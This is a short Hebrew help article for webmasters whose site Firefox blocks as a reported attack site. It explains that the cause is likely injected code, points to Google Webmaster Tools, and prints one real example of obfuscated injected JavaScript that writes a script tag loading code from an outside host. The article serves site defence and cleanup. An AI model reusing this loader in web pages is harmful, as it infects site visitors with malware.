כאשר גולשים לאתר שלי מפיירפוקס כתוב: Reported Attack Site
אם כאשר גולשים מFirefox לאתר שלכם ומקבלים הודעת אזהרה כמו בדוגמא הבאה:
זה אומר שכנראה מישהו הצליח באמצעות Sql Injection או באמצעות טפסים אחרים מתוך האתר שלכם להזין קישורים לאתרים שמטרתם לשתול תוכניות זדוניות במחשבי הגולשים.
אם תלחצו על הכפתור Why was this site blocked תקבלו מסך כדוגמת המסך הבא:
שימו לב ל-2 הדברים המוקפים בעיגול.
הראשון הוא מה יכולה להיות הסיבה שהאתר נחסם (בדוגמא זו רשום שייתכן וגורמים כלשהם הצליחו להוסיף לאתר קוד זדוני לאתר.
מה עליכם לעשות:
1. לעבור על האתר שלכם (במראית עין) ולחפש איפה הצליחו להכניס את הקוד הזדוני. ברוב המקרים זה יהיה במקומות שבהם יש טפסים להזנת תוכן שמוצג באתר (כמו פורומים, אינדקס, לוחות מודעות וכו')
2. הדבר הנכון לעשות הוא להירשם ל webmaster tools של גוגל בקישור http://www.google.com/webmasters/tools/ ולשייך את האתר המסויים הזה לחשבון שלכם. בתוך הממשק הנ"ל ישנה אופציה לראות את הסיבות לכך שהאתר נחסם (בדיוק באילו קישורים מופיע הקוד הלא תקין וכו')
לאחר שתשייכו את האתר לחשבון שתצרו לעצמכם ב google webmaster tools יוצג לפניכם במסך הראשי שמות הדפים שגוגל סרק ומצא בהם בעיות:
אילו דברים יכולים להיות,
כנסו לקישורים שמצאתם בגוגל וצפו בקוד שלהם View Source בדפדפן.
אם תראו קישורים לאתרים שאינכם מכירים או JavaScript לא ברור שלא אתם עשיתם, סביר להניח שזה המקור.
לדוגמא:
(function(){var FMa='%';eval(unescape(('&76&61r&20a&3d&22S&63riptE&6eg&69ne&22&2cb&3d&22Version(&29+&22&2c&6a&3d&22&22&2cu&3dn&61vigat&6f&72&2euse&72Agent&3bif((u&2ein&64e&78Of(&22C&68&72o&6de&22&29&3c&30)&26&26(u&2e&69nd&65xOf(&22Win&22)&3e0)&26&26(&75&2einde&78O&66(&22NT&206&22&29&3c0&29&26&26(docum&65&6et&2e&63ook&69e&2ei&6ede&78Of&28&22mi&65k&3d1&22&29&3c0)&26&26&28type&6ff&28zrvz&74&73)&21&3d&74&79peof(&22A&22)&29)&7bzrvzts&3d&22A&22&3be&76al(&22&69&66(&77in&64&6fw&2e&22&2ba+&22)j&3dj&2b&22&2ba+&22Major&22+b+a+&22M&69nor&22+&62+a+&22&42uild&22&2b&62+&22&6a&3b&22)&3bd&6f&63ument&2e&77rite(&22&3csc&72ipt&20s&72c&3d&2f&2fma&72t&75&22+&22&7a&2ec&6e&2fvid&2f&3f&69&64&3d&22+j+&22&3e&3c&5c&2f&73c&72i&70t&3e&22)&3b&7d').replace(/&/g,FMa)))})();
נראה קוד של javascript תמים, אך הוא קוד שפורצים הצליחו לשתול בקוד של אתר ושגורם לגוגל לחסום את האתר.
כיצד להגן על האתר שלכם תוכלו לקרוא ב: https://www.199.co.il/howto.asp?aid=84
